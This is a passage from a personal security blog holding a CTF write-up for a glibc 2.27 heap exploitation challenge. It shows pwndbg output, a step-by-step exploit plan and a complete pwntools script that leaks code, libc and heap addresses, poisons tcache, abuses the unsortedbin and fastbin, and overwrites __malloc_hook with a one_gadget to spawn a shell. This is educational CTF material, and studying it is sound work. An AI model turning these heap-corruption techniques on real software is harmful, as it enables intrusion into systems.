<span class="number">65536</span>,</span><br><span class="line">  max_n_mmaps = <span class="number">0</span>,</span><br><span class="line">  no_dyn_threshold = <span class="number">0</span>,</span><br><span class="line">  mmapped_mem = <span class="number">0</span>,</span><br><span class="line">  max_mmapped_mem = <span class="number">0</span>,</span><br><span class="line">  sbrk_base = <span class="number">0x555555758000</span> <span class="string">""</span>,</span><br><span class="line">  tcache_bins = <span class="number">64</span>,  &lt;-- 【fake size of <span class="number">0x40</span>】</span><br><span class="line">  tcache_max_bytes = <span class="number">1032</span>,</span><br><span class="line">  tcache_count = <span class="number">7</span>,</span><br><span class="line">  tcache_unsorted_limit = <span class="number">0</span></span><br><span class="line">&#125;</span><br><span class="line">pwndbg&gt; p &amp;mp_</span><br><span class="line">$<span class="number">2</span> = (struct malloc_par *) <span class="number">0x7ffff7dcf280</span> &lt;mp_&gt;</span><br></pre></td></tr></table></figure></p>
<p>It is a structure in <code>libc</code>, which contains some information of the tcache status. And I spotted there is a fake size 64(0x40) in the structure, right before <code>mp_.tcache_count</code>. We can use fastbin attack to modify <code>mp_.tcache_count</code> here!<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; p &amp;mp_.tcache_count </span><br><span class="line">$<span class="number">3</span> = (<span class="keyword">size_t</span> *) <span class="number">0x7ffff7dcf2e0</span> &lt;mp_+<span class="number">96</span>&gt;</span><br><span class="line">pwndbg&gt; fakefast <span class="number">0x7ffff7dcf2e0</span></span><br><span class="line">-- size : <span class="number">0x40</span> --</span><br><span class="line">fake chunk : <span class="number">0x7ffff7dcf2c8</span>  padding : <span class="number">8</span>       </span><br><span class="line">pwndbg&gt;</span><br></pre></td></tr></table></figure></p>
<p>Our target is to make <code>tcache-&gt;counts[tc_idx] &lt; mp_.tcache_count</code> become true, <code>tcache-&gt;counts[tc_idx]=0xffffffffffffffff(-1)</code> now, while the comparison is unsigned, we cannot found any <code>tcache_count</code> to fullfill the condition. However, we can make <code>tcache-&gt;counts[tc_idx]=0xfffffffffffffffe(-2)</code> and <code>mp_.tcache_count=0xffffffffffffffff(-1)</code>. Then we are good to use tcache again.</p>
<h2 id="Exploitation"><a href="#Exploitation" class="headerlink" title="Exploitation"></a>Exploitation</h2><p>Here is the exploit plan:</p>
<ol>
<li>leak code address</li>
<li>leak libc address</li>
<li>leak heap address</li>
<li>tcache poisioning to make <code>tcache[idx]-&gt;count = -2</code></li>
<li>unsortedbin attack aginst <code>HIGH</code></li>
<li>fastbin attack against <code>mp_.tcache_count</code>, make it <code>-1</code>.</li>
<li>tcache poisioning against <code>__malloc_hook</code> to <code>one_gadget</code>.</li>
</ol>
<p>The final exp, this is constructed when ASLR is off, some adjustments is necessary for remote target:<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">context.terminal = [<span class="string">'tmux'</span>, <span class="string">'splitw'</span>, <span class="string">'-h'</span>]</span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line">env = &#123;<span class="string">'LD_PRELOAD'</span>: <span class="string">''</span>&#125;</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">libc = ELF(<span class="string">'./libc-2.27.so'</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> len(sys.argv) == <span class="number">1</span>:</span><br><span class="line">    p = process(<span class="string">'./one'</span>)</span><br><span class="line"><span class="keyword">elif</span> len(sys.argv) == <span class="number">3</span>:</span><br><span class="line">    p = remote(sys.argv[<span class="number">1</span>], sys.argv[<span class="number">2</span>])</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">se      = <span class="keyword">lambda</span> data               :p.send(data) </span><br><span class="line">sa      = <span class="keyword">lambda</span> delim,data         :p.sendafter(delim, data)</span><br><span class="line">sl      = <span class="keyword">lambda</span> data               :p.sendline(data)</span><br><span class="line">sla     = <span class="keyword">lambda</span> delim,data         :p.sendlineafter(delim, data)</span><br><span class="line">sea     = <span class="keyword">lambda</span> delim,data         :p.sendafter(delim, data)</span><br><span class="line">rc      = <span class="keyword">lambda</span> numb=<span class="number">4096</span>          :p.recv(numb)</span><br><span class="line">ru      = <span class="keyword">lambda</span> delims, drop=<span class="literal">True</span>  :p.recvuntil(delims, drop)</span><br><span class="line">uu32    = <span class="keyword">lambda</span> data               :u32(data.ljust(<span class="number">4</span>, <span class="string">'\0'</span>))</span><br><span class="line">uu64    = <span class="keyword">lambda</span> data               :u64(data.ljust(<span class="number">8</span>, <span class="string">'\0'</span>))</span><br><span class="line">info_addr = <span class="keyword">lambda</span> tag, addr        :p.info(tag + <span class="string">': &#123;:#x&#125;'</span>.format(addr))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(s)</span>:</span></span><br><span class="line">    sla(<span class="string">"&gt;&gt;"</span>, <span class="string">"1"</span>)</span><br><span class="line">    sea(<span class="string">":"</span>, s)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span><span class="params">(idx, old, new)</span>:</span></span><br><span class="line">    sla(<span class="string">"&gt;&gt;"</span>, <span class="string">"2"</span>)</span><br><span class="line">    sla(<span class="string">"string:"</span>, str(idx))</span><br><span class="line">    sea(<span class="string">"edit:"</span>, old)</span><br><span class="line">    sla(<span class="string">"into:"</span>, new)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span><span class="params">(idx)</span>:</span></span><br><span class="line">    sla(<span class="string">"&gt;&gt;"</span>, <span class="string">"3"</span>)</span><br><span class="line">    sla(<span class="string">"string:"</span>, str(idx))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span><span class="params">(idx)</span>:</span></span><br><span class="line">    sla(<span class="string">"&gt;&gt;"</span>, <span class="string">"4"</span>)</span><br><span class="line">    sla(<span class="string">"string:"</span>, str(idx))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">secret</span><span class="params">(idx)</span>:</span></span><br><span class="line">    sla(<span class="string">"&gt;&gt;"</span>, <span class="string">"12580"</span>)</span><br><span class="line">    sla(<span class="string">")"</span>, <span class="string">"Y"</span>)</span><br><span class="line">    sla(<span class="string">"?"</span>, str(idx))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">fill</span><span class="params">(idx, content)</span>:</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(len(content)):</span><br><span class="line">        edit(idx, <span class="string">"\x00"</span>, content[i])</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">replace</span><span class="params">(idx, old, new)</span>:</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(len(old)<span class="number">-1</span>, <span class="number">-1</span>, <span class="number">-1</span>):</span><br><span class="line">        <span class="keyword">if</span> old[i] != <span class="string">'\x00'</span>:</span><br><span class="line">            edit(idx, old[i] + <span class="string">'\x00'</span>, new[i])</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            edit(idx, old[i], new[i])</span><br><span class="line"></span><br><span class="line"><span class="comment"># leak code</span></span><br><span class="line">secret(<span class="number">0x80000000</span>)</span><br><span class="line">ru(<span class="string">"string:\n"</span>)</span><br><span class="line">content = ru(<span class="string">"\n\n--"</span>)</span><br><span class="line">leak_code = uu64(content)</span><br><span class="line">info_addr(<span class="string">"leak_code"</span>, leak_code)</span><br><span class="line">bss = leak_code - <span class="number">0xc0</span></span><br><span class="line">info_addr(<span class="string">"bss"</span>, bss)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">10</span>):</span><br><span class="line">    add(str(i)*<span class="number">0x20</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">9</span>):</span><br><span class="line">    add(str(i)*<span class="number">0x20</span>)</span><br><span class="line"></span><br><span class="line">fill(<span class="number">0</span>, <span class="string">"0"</span>*<span class="number">0x18</span>)</span><br><span class="line">edit(<span class="number">0</span>, <span class="string">"\x41\x00"</span>, <span class="string">"\x41"</span>)</span><br><span class="line">edit(<span class="number">0</span>, <span class="string">"\x00"</span>, <span class="string">"\x04"</span>)</span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">add(<span class="string">"1"</span>*<span class="number">0x20</span>)</span><br><span class="line">show(<span class="number">2</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># leak libc</span></span><br><span class="line">ru(<span class="string">"is:\n"</span>)</span><br><span class="line">content = ru(<span class="string">"\n"</span>)</span><br><span class="line">leak_libc = uu64(content)</span><br><span class="line">info_addr(<span class="string">"leak_libc"</span>, leak_libc)</span><br><span class="line">libc.address = leak_libc - <span class="number">0x3ebca0</span></span><br><span class="line">info_addr(<span class="string">"libc"</span>, libc.address)</span><br><span class="line"></span><br><span class="line">add(<span class="string">"9"</span>*<span class="number">0x20</span>)</span><br><span class="line">delete(<span class="number">18</span>)</span><br><span class="line">delete(<span class="number">19</span>)</span><br><span class="line">show(<span class="number">2</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># leak heap</span></span><br><span class="line">ru(<span class="string">"is:\n"</span>)</span><br><span class="line">content = ru(<span class="string">"\n"</span>)</span><br><span class="line">leak_heap = uu64(content)</span><br><span class="line">info_addr(<span class="string">"leak_heap"</span>, leak_heap)</span><br><span class="line">heap = leak_heap - <span class="number">0x7d0</span></span><br><span class="line">info_addr(<span class="string">"heap"</span>, heap)</span><br><span class="line"></span><br><span class="line"><span class="comment"># recover</span></span><br><span class="line">add(<span class="string">"2"</span>*<span class="number">0x20</span>)</span><br><span class="line">add(<span class="string">"8"</span>*<span class="number">0x20</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># prepare empty slot </span></span><br><span class="line">edit(<span class="number">0</span>, <span class="string">"\x41\x00"</span>, <span class="string">"\x81"</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">10</span>, <span class="number">17</span>):</span><br><span class="line">    fill(i, <span class="string">"0"</span>*<span class="number">0x18</span>)</span><br><span class="line">    edit(i, <span class="string">"\x41\x00"</span>, <span class="string">"\x81"</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">11</span>, <span class="number">18</span>):</span><br><span class="line">    delete(i)</span><br><span class="line"></span><br><span class="line"><span class="comment"># prepare tcache[idx]-&gt;count = -2</span></span><br><span class="line">delete(<span class="number">5</span>)</span><br><span class="line">fill(<span class="number">4</span>, <span class="string">"4"</span>*<span class="number">0x18</span>)</span><br><span class="line">fill(<span class="number">4</span>, <span class="string">"B"</span>*<span class="number">7</span>)</span><br><span class="line">fill(<span class="number">4</span>, p64(heap + <span class="number">0x450</span>))</span><br><span class="line">replace(<span class="number">4</span>, <span class="string">"4"</span>*<span class="number">8</span>, <span class="string">"abcdefgh"</span>)</span><br><span class="line">replace(<span class="number">4</span>, <span class="string">"hgfedcba"</span>, p64(heap + <span class="number">0x450</span>))</span><br><span class="line">add(<span class="string">"C"</span>*<span class="number">0x20</span>)</span><br><span class="line">add(<span class="string">"\x00"</span>)</span><br><span class="line">add(<span class="string">"\x00"</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># unsortedbin attack against HIGH</span></span><br><span class="line">target = bss + <span class="number">0x160</span></span><br><span class="line">fill(<span class="number">2</span>, <span class="string">"2"</span>*<span class="number">0x18</span>)</span><br><span class="line">fill(<span class="number">2</span>, <span class="string">"abcdef"</span>)</span><br><span class="line">replace(<span class="number">2</span>, p64(leak_libc), <span class="string">"ABCDEFGH"</span>)</span><br><span class="line">replace(<span class="number">2</span>, p64(leak_libc), p64(target - <span class="number">0x10</span>))</span><br><span class="line">edit(<span class="number">2</span>, <span class="string">"G\x00"</span>, <span class="string">"\x00"</span>)</span><br><span class="line">edit(<span class="number">2</span>, <span class="string">"H\x00"</span>, <span class="string">"\x00"</span>)</span><br><span class="line">replace(<span class="number">2</span>, <span class="string">"ABCDEF"</span>, p64(leak_libc)[:<span class="number">6</span>])</span><br><span class="line">replace(<span class="number">2</span>, <span class="string">"abcdef"</span>, <span class="string">"\x00"</span>*<span class="number">6</span>)</span><br><span class="line">edit(<span class="number">2</span>, <span class="string">"\xc1\x00"</span>, <span class="string">"\x41"</span>)</span><br><span class="line">edit(<span class="number">2</span>, <span class="string">"\x03\x00"</span>, <span class="string">"\x00"</span>)</span><br><span class="line">add(<span class="string">"1"</span>*<span class="number">0x20</span>)</span><br><span class="line">gdb.attach(p, gdbcmd)</span><br><span class="line"></span><br><span class="line"><span class="comment"># fastbin attack against mp_.tcache_count</span></span><br><span class="line">mp_target = libc.address + <span class="number">0x3eb2c8</span> </span><br><span class="line">delete(<span class="number">7</span>)</span><br><span class="line">fill(<span class="number">6</span>, <span class="string">"2"</span>*<span class="number">0x18</span>)</span><br><span class="line">fill(<span class="number">6</span>, <span class="string">"abcdefg"</span>)</span><br><span class="line">fill(<span class="number">6</span>, p64(mp_target)[:<span class="number">6</span>])</span><br><span class="line">replace(<span class="number">6</span>, <span class="string">"abcdefg"</span>, <span class="string">"\x00"</span>*<span class="number">7</span>)</span><br><span class="line">add(<span class="string">"junk\n"</span>)</span><br><span class="line">add(<span class="string">"A"</span>*<span class="number">8</span>+ <span class="string">'\xff'</span>+<span class="string">'\xff'</span>*<span class="number">7</span>+<span class="string">"\n"</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># tcache poisioning against __malloc_hook</span></span><br><span class="line">delete(<span class="number">2</span>)</span><br><span class="line">fill(<span class="number">18</span>, p64(libc.symbols[<span class="string">'__malloc_hook'</span>]))</span><br><span class="line">add(<span class="string">"junk\n"</span>)</span><br><span class="line">one_gadget = libc.address + <span class="number">0x10a38c</span></span><br><span class="line">add(p64(one_gadget))</span><br><span class="line">delete(<span class="number">2</span>)</span><br><span class="line">add(<span class="string">"trigger"</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></p>
<h2 id="Wrapup"><a href="#Wrapup" class="headerlink" title="Wrapup"></a>Wrapup</h2><p>In this writeup, we can see how to perform unsortedbin attack to overwrite a certain variable in glibc 2.27, and recover the tcache feature afterward. I think that the <code>0x40</code> size is carefully chosen by the designer, helpping us to get a foothole on <code>mp_</code> structure. <a href="https://github.com/r3kapig/CTF-challenge/tree/master/20190528-qwb#one" target="_blank" rel="noopener">The writeup</a> from r3kpig use another method to change <code>HIGH</code> variable, and <a href="http://tukan.farm/2017/07/08/tcache/" target="_blank" rel="noopener">this post</a> mentioned the smallbin cache filling mechanisum can also achieve same effect.</p>
<h2 id="References"><a href="#References" class="headerlink" title="References"></a>References</h2><ol>
<li><a href="http://matshao.com/2019/05/04/Heap-Master-Review/">http://matshao.com/2019/05/04/Heap-Master-Review/</a></li>
<li><a href="https://github.com/shellphish/how2heap" target="_blank" rel="noopener">https://github.com/shellphish/how2heap</a></li>
<li><a href="https://github.com/firmianay/CTF-All-In-One/blob/master/doc/3.1.8_heap_exploit_3.md#unsorted_bin_attack" target="_blank" rel="noopener">https://github.com/firmianay/CTF-All-In-One/blob/master/doc/3.1.8_heap_exploit_3.md#unsorted_bin_attack</a></li>
<li><a href="https://github.com/r3kapig/CTF-challenge/tree/master/20190528-qwb#one" target="_blank" rel="noopener">https://github.com/r3kapig/CTF-challenge/tree/master/20190528-qwb#one</a></li>
<li><a href="http://tukan.farm/2017/07/08/tcache/" target="_blank" rel="noopener">http://tukan.farm/2017/07/08/tcache/</a></li>
</ol>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>


    <footer class="post-footer">
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/05/20/Virtual-Box-Exploitation-2/" rel="next" title="Virtual Box Exploitation #2">
                <i class="fa fa-chevron-left"></i> Virtual Box Exploitation #2
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/06/21/今日夏至-1/" rel="prev" title="今日夏至">
                今日夏至 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>

          
          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目錄
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            本站概覽
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image" src="/images/avatar.gif" alt="Matthew Shao">
          <p class="site-author-name" itemprop="name">Matthew Shao</p>
          <p class="site-description motion-element" itemprop="description">半缘修道半缘君</p>
        </div>
        <nav class="site-state motion-element">
        
          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">45</span>
                <span class="site-state-item-name">文章</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-categories">
              <a href="/categories">
                <span class="site-state-item-count">2</span>
                <span class="site-state-item-name">分類</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">13</span>
                <span class="site-state-item-name">標籤</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/MatthewShao" target="_blank" title="Github">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  Github
                </a>
              </span>
            
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Vulnerability"><span class="nav-number">1.</span> <span class="nav-text">Vulnerability</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Analyze"><span class="nav-number">2.</span> <span class="nav-text">Analyze</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Unsortedbin-Attack-in-Glibc-2-27"><span class="nav-number">2.1.</span> <span class="nav-text">Unsortedbin Attack in Glibc 2.27</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Tcache-recovering"><span class="nav-number">2.2.</span> <span class="nav-text">Tcache recovering</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Exploitation"><span class="nav-number">3.</span> <span class="nav-text">Exploitation</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Wrapup"><span class="nav-number">4.</span> <span class="nav-text">Wrapup</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#References"><span class="nav-number">5.</span> <span class="nav-text">References</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Matthew Shao</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 強力驅動
</div>

<div class="theme-info">
  主題 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Logos
  </a>
</div>


        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  




  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  


  <script type="text/javascript" src="/js/src/schemes/logos.js?v=5.1.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  



  




	





  





  

  




  
  

  

  

  

  


</body>
</html>
